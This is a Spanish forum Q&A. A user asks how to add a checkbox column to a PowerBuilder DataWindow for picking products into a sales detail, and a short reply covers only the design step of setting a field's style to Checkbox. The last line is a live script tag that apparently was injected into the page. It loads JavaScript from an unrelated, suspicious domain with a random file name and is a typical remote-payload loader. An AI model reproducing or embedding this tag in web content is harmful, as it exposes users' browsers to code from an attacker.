Datawindow detalle power builder

Estoy haciendo mi detalle de venta tengo una ventana con mi dw detalle (id_detalle, id_producto, cantidad, precio). Un control button que me envía a una ventana tipo response para buscar los productos con dw tabular, lo que quiero hacer es que a este dw tabular agregarle un control checkbox al costado de las filas del dw para darle check a los productos que voy a pasar al detalle por ejemplo:
selección / producto / precio / stock /
[] mouse 15.00 50
Todos los productos seleccionados con el check serán pasados al detalle.
No se como agregar el checkbox y como seria la codificación en la ventana de búsqueda

1 Respuesta

Respuesta

Es fácil mira, en el diseño de tu datawindow duplica un campo cualquiera y pégalo . Ahora selecciona ese campo, luego ve a la pestaña "edit" (en las propiedades) y cambiale el Style type a Checkbox.

Bueno suerte espero que eso te ayude, la programación te lo dejare de tarea =P, ademas que ando un poco fuera de ritmo con powerbuilder.

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.7640105365665213"></script>